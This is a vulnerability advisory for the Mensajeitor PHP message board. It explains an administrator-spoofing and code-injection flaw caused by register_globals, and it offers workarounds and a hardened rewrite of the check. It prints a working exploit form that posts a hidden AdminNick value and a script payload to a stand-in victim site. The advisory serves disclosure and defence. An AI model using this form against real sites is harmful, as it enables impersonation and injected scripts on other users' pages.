Mensajeitor Code Injection Admin Spoof

2004-07-21T05:10:36
ID OSVDB:8124
Type osvdb
Reporter Jordi Corrales(jordi@shellsec.net)
Modified 2004-07-21T05:10:36

Description

Vulnerability Description

Mensajeitor contains a flaw that allows an attacker to post a message as an administrator. The problem is that there is no default value for the $AdminNick variable in mensajeitor.php, so the checks on this variable can potentially be bypassed, allowing an attacker to impersonate the administrator and post messages with higher privileges.

Technical Description

Vulnerable code:

for ($i = 0; $i < count($NicksRegs); $i++) {
    list($admin_nick, $admin_pass) = explode(":", $NicksRegs[$i]);

    if ($nick == $admin_nick) {
        $cadena_final .= "<span class=\"admin\">".$nick."</span>";
        $AdminNick = "si";
    }
}

if ($AdminNick != "si") { $cadena_final .= "<acronym title='".nickinfo($nick_info)."'>$nick</acronym>"; }

As can be seen in the previous code, $AdminNick is never given a default value, and if the check fails the code never assigns it at all. Because the script relies on register_globals, a remote attacker can place himself in the admin group simply by supplying a value for the $AdminNick request parameter. This opens the product up to further attacks, among them HTML and code injection.

Exploit code:

<html>
<head><title>Mensajeitor Exploit</title></head>
<body>
Inyeccion codigo en Mensajeitor =< v1.8.9 r1<br><br>

<form name="form1" method="post" action="http://www.victima.com/mensajeitor.php">
  <input type="text" name="nick" size="10" value="Nick" maxlength="9"><br>
  <input type="text" name="titulo" size="21" value="Mensaje"><br>
  <input type="text" name="url" size="21" value="http://"><br>
  <input type="hidden" name="AdminNick" value="si"><br>
  Introduce codigo a insertar (</table> debe incluirse al principio)<br>
  <input type="text" name="cadena_final" size="75%" value="</table><script>alert('hacked ;)')</script>"><br>
  <input type="submit" name="enviar" value="Enviar" class="form"><br>
</form>

MensajeitorPHP propiedad de aaff.<br>
By Jordi Corrales (Shell Security Group, http://www.shellsec.net)
</body>
</html>

Solution Description

Upgrade to version 1.8.9 R2 or higher, which has been reported to fix this vulnerability. Alternatively, the flaw can be corrected with the following workarounds:

In mensajeitor.php, before the line

$nick = htmlspecialchars($nick);

insert this PHP code:

if ($cadena_final) { unset($cadena_final); }

Another possible workaround for versions 1.8.x is to set the register_globals directive of php.ini to off.
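The root cause described above is that, with register_globals on, every request parameter becomes a PHP variable, so any variable the script reads before assigning it ($AdminNick, $cadena_final) can be pre-seeded by the client. The following added example (not Mensajeitor's own code) shows the quoted admin check rewritten to initialise its state and read input only from $_POST; the $NicksRegs format and the nickinfo() helper are assumed to have the shape the advisory shows.

```php
<?php
// Added example, not Mensajeitor's code. Hardened form of the check quoted in
// the advisory: every variable the logic depends on is initialised locally and
// input is read explicitly from $_POST, so a client-supplied "AdminNick" or
// "cadena_final" parameter has no effect whether or not register_globals is on.

// Constructed sample data: registered admin accounts as "nick:password".
$NicksRegs = array("admin:s3cret", "mod:hunter2");

// Assumed stand-in for the page's nickinfo() helper (real one not shown).
function nickinfo($info) { return htmlspecialchars($info, ENT_QUOTES); }

function renderNick(array $NicksRegs, array $post) {
    // Explicit defaults: nothing here can be pre-seeded by the request.
    $AdminNick    = "no";
    $cadena_final = "";

    // Read only the parameters the form is expected to send.
    $nick      = isset($post['nick']) ? $post['nick'] : "";
    $nick_info = isset($post['nick_info']) ? $post['nick_info'] : "";

    // Encode before embedding in HTML.
    $nick = htmlspecialchars($nick, ENT_QUOTES);

    foreach ($NicksRegs as $reg) {
        list($admin_nick, $admin_pass) = explode(":", $reg, 2);
        if ($nick === $admin_nick) {
            $cadena_final .= "<span class=\"admin\">" . $nick . "</span>";
            $AdminNick = "si";
        }
    }
    if ($AdminNick !== "si") {
        $cadena_final .= "<acronym title='" . nickinfo($nick_info) . "'>$nick</acronym>";
    }
    return $cadena_final;
}

// Constructed request mimicking the advisory's form: the client sends
// AdminNick=si and its own cadena_final, but neither is ever read.
$spoofed = array(
    'nick'         => 'Nick',
    'AdminNick'    => 'si',
    'cadena_final' => '</table><script>alert(1)</script>',
);
echo renderNick($NicksRegs, $spoofed), "\n";
```

Run with php on the command line; the spoofed request renders as an ordinary user and the injected markup never reaches the output.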

Short Description

Mensajeitor contains a flaw that allows an attacker to post a message as an administrator. The problem is that there is no default value for the $AdminNick variable in mensajeitor.php, so the checks on this variable can potentially be bypassed, allowing an attacker to impersonate the administrator and post messages with higher privileges.

References:

Vendor URL: http://www.mensajeitor.com/
Other Advisory URL: http://www.shellsec.net/leer_advisory.php?id=4
Other Advisory URL: http://www.securiteam.com/unixfocus/5UP0R0ADFW.html
ISS X-Force ID: 16753
Generic Informational URL: http://cyruxnet.org/foro/viewtopic.php?t=499